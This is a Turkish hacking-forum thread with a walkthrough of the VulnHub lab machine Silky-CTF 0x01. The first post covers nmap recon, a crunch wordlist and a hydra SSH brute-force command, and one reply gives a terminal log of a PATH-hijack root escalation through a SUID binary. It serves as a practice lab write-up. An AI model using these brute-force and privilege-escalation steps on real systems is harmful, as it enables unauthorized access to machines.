THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

Silky-CTF: 0x01 Zafiyetli Makinesinin Çözümü//"P4RS

P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
9
2176
17-12-2019 23:06
#1
Merhabalar TürkHackTeam ailesi, bugün sizlere "Silky-CTF: 0x01 Zafiyetli Makinesinin Çözümünü" göstereceğim.



https://www.vulnhub.com/entry/silky-ctf-0x01,306/



Makine İsmi: Silky-CTF: 0x01

Yayınlanma Tarihi: 27 Nisan 2019

Yapımcı: Silky

Seri: Silky-CTF

Açıklama: Hedefteki Root dizinin de ki Flag'a erişmek

Dosya Boyutu: 2.5 GB

İşletim Sistemi: Linux

Zorluk Derecesi:
Kolay-Orta




İlk öncelikle makinenin IP adresini öğrenmek için
Kod:
sudo netdiscover
yazıyoruz.



Hedefimiz IP adresini bu şekilde öğrenmiş olduk.



NMAP taraması yaparak hangi portların açık olduğunu öğrenmek için
Kod:
nmap -A IP_ADRESİ
yazalım. Gördüğünüz gibi 22 ve 80 portları açık ve burada önemli olan mavi alana aldığım robots.txt ve notes.txt yolları



80 portunun açık olması bir site açık olduğunu anladım içeri girince apache tabanlı bir site olduğunu gördüm.



İlk robots.txt'e gittim beni notes.txt kısmına yönlendirdi oradan görüntü fakat Almanca bir yazı yazılmış.



Çevirdiğimizde "Şifreyi sayfadan yok etmesi gerekiyor, her şeye rağmen sonda ki 2 karakter kayıpmış. "



Siteye tekrar geldim ve kodlara baktığımda script.js dosyasında bir şeyler buldum.



Gördüğünüz gibi şifreye ait bir değer bulduk.



Bizlere ipucu olarak son 2 karakter kayıp demişti. Şifre listesini crunch aracı ile oluşturacağım terminale
Kod:
crunch 7 7 -t s1lKy^% >> sifre.txt
yazdım ve şifre listesi oluştu.



Hydra aracı ile de ssh servisine brute saldırısı yapacağız. Terminale
Kod:
hydra -l silky -P sifre.txt IP_ADRES ssh
yazalım ve şifremizi alalım.



SSH olarak bağlanmak için terminale
Kod:
ssh [email protected]_ADRES
yazalım.



SUID özellikli dosyaları aradım ve burada ki /usr/bin/sky dosyası gözüme takıldı ve terminale
Kod:
/usr/bin/sky
yazdırdığımda Almanca bir metin ve root yazdığını gördüm.



Almanca bir metin ve whoami komutu çalıştırılmış.





Kök ayrıcalığını yükseltmek için PATH değişkenini kullanacağım. Bunun için
Kod:
echo '/bin/sh' > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/sky
ilginç bir şekilde id yazdığımda root yetkisini alamadım fakat
Kod:
cd /root
yazdığımda giriş yaptım ve flag.txt dosyasını yazdırmam da bir izin hatası almadım bayrağı da almış oldu






Konum bu kadardı arkadaşlar, başka bir konuda görüşmek üzere sağlıcakla...

---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
Konu P4RS tarafından (19-04-2020 14:09 Saat 14:09 ) değiştirilmiştir.
Rumexus - ait Kullanıcı Resmi (Avatar)
Uzman Üye
Üyelik tarihi:
01/2016
Nereden:
7
Mesajlar:
1.823
Konular:
113
Teşekkür (Etti):
1065
Teşekkür (Aldı):
825
Ticaret:
(0) %
17-12-2019 23:12
#2
Elinize sağlık hocam.
---------------------
Acizler için imkansız, korkaklar için inanılmaz gözüken şeyler kahramanlar için idealdir.
By Ghost - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
C:\Linux
Yaş:
24
Mesajlar:
939
Konular:
144
Teşekkür (Etti):
400
Teşekkür (Aldı):
457
Ticaret:
(0) %
17-12-2019 23:15
#3
Elinize sağlık hocam sade ve güzel bir anlatım yapmışsınız
---------------------
Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--
PourLa - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
03/2016
Nereden:
Mesajlar:
1.668
Konular:
310
Teşekkür (Etti):
630
Teşekkür (Aldı):
872
Ticaret:
(0) %
17-12-2019 23:50
#4
Elinize sağlık hocam güzel bir anlatım olmuş
---------------------
PourLa
Html/Css > Python > C ve C++
( }-----{ TÜRK HACK TEAM }-----{ )
Twitter | Telegram | İnstagram
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
18-12-2019 18:22
#5
Alıntı:
Rumexus´isimli üyeden Alıntı Mesajı göster
Elinize sağlık hocam.
Alıntı:
By Ghost´isimli üyeden Alıntı Mesajı göster
Elinize sağlık hocam sade ve güzel bir anlatım yapmışsınız
Alıntı:
PourLa´isimli üyeden Alıntı Mesajı göster
Elinize sağlık hocam güzel bir anlatım olmuş
Beğenmenize sevindim arkadaşlar
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
GZM16 - ait Kullanıcı Resmi (Avatar)
Katılımcı Üye
Üyelik tarihi:
05/2018
Nereden:
Uzman Çavuş
Mesajlar:
387
Konular:
3
Teşekkür (Etti):
248
Teşekkür (Aldı):
203
Ticaret:
(0) %
18-12-2019 19:01
#6
Ellerinize sağlık hocam.
--------------------- Anılmakla hangi ruh olmaz ki sarhoş!
cockpyte - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
10/2019
Mesajlar:
45
Konular:
5
Teşekkür (Etti):
5
Teşekkür (Aldı):
21
Ticaret:
(0) %
18-12-2019 19:34
#7
Ellerinize sağlık hocam bilgilendirici ve yararlı bir konu olmuş.
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
19-12-2019 11:40
#8
Alıntı:
GZM16´isimli üyeden Alıntı Mesajı göster
Ellerinize sağlık hocam.
Alıntı:
cockpyte´isimli üyeden Alıntı Mesajı göster
Ellerinize sağlık hocam bilgilendirici ve yararlı bir konu olmuş.
Beğenmenize sevindim arkadaşlar
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
ZoRRoKiN - ait Kullanıcı Resmi (Avatar)
Administrator
Üyelik tarihi:
08/2005
Nereden:
WORLD
Mesajlar:
2.114
Konular:
796
Teşekkür (Etti):
455
Teşekkür (Aldı):
6733
Ticaret:
(1) %
04-01-2020 12:22
#9
id yazdığınızda yetki alamıyorsanız bir de şu şekilde deneyin.

Kod:
[email protected]:/tmp$ cd /tmp
[email protected]:/tmp$ ls
hsperfdata_root
pulse-PKdhtXMmr18n
systemd-private-d672f2af828d44d481839d78868a14d5-apache2.service-V58Rge
systemd-private-d672f2af828d44d481839d78868a14d5-colord.service-a7R6Hh
systemd-private-d672f2af828d44d481839d78868a14d5-rtkit-daemon.service-8bWI5m
systemd-private-d672f2af828d44d481839d78868a14d5-systemd-timesyncd.service-HmZtVn
[email protected]:/tmp$ echo '/bin/sh' > whoami
[email protected]:/tmp$ chmod 777 whoami
[email protected]:/tmp$ ls
hsperfdata_root
pulse-PKdhtXMmr18n
systemd-private-d672f2af828d44d481839d78868a14d5-apache2.service-V58Rge
systemd-private-d672f2af828d44d481839d78868a14d5-colord.service-a7R6Hh
systemd-private-d672f2af828d44d481839d78868a14d5-rtkit-daemon.service-8bWI5m
systemd-private-d672f2af828d44d481839d78868a14d5-systemd-timesyncd.service-HmZtVn
whoami
[email protected]:/tmp$ export PATH=/tmp:$PATH
[email protected]:/tmp$ /usr/bin/sky
Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen. 
gezeichnet:
# id
uid=1000(silky) gid=1000(silky) euid=0(root) Gruppen=1000(silky),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner)
#
--------------------- Ne fark eder ki...
Konu ZoRRoKiN tarafından (04-01-2020 14:47 Saat 14:47 ) değiştirilmiştir.
P4RS Teşekkür etti.
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
04-01-2020 14:48
#10
Alıntı:
ZoRRoKiN´isimli üyeden Alıntı Mesajı göster
id yazdığınızda yetki alamıyorsanız bir de şu şekilde deneyin.

Kod:
[email protected]:/tmp$ cd /tmp
[email protected]:/tmp$ ls
hsperfdata_root
pulse-PKdhtXMmr18n
systemd-private-d672f2af828d44d481839d78868a14d5-apache2.service-V58Rge
systemd-private-d672f2af828d44d481839d78868a14d5-colord.service-a7R6Hh
systemd-private-d672f2af828d44d481839d78868a14d5-rtkit-daemon.service-8bWI5m
systemd-private-d672f2af828d44d481839d78868a14d5-systemd-timesyncd.service-HmZtVn
[email protected]:/tmp$ echo '/bin/sh' > whoami
[email protected]:/tmp$ chmod 777 whoami
[email protected]:/tmp$ ls
hsperfdata_root
pulse-PKdhtXMmr18n
systemd-private-d672f2af828d44d481839d78868a14d5-apache2.service-V58Rge
systemd-private-d672f2af828d44d481839d78868a14d5-colord.service-a7R6Hh
systemd-private-d672f2af828d44d481839d78868a14d5-rtkit-daemon.service-8bWI5m
systemd-private-d672f2af828d44d481839d78868a14d5-systemd-timesyncd.service-HmZtVn
whoami
[email protected]:/tmp$ export PATH=/tmp:$PATH
[email protected]:/tmp$ /usr/bin/sky
Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen. 
gezeichnet:
# id
uid=1000(silky) gid=1000(silky) euid=0(root) Gruppen=1000(silky),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner)
#
Bilgilendirme için teşekkür ederim hocam
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler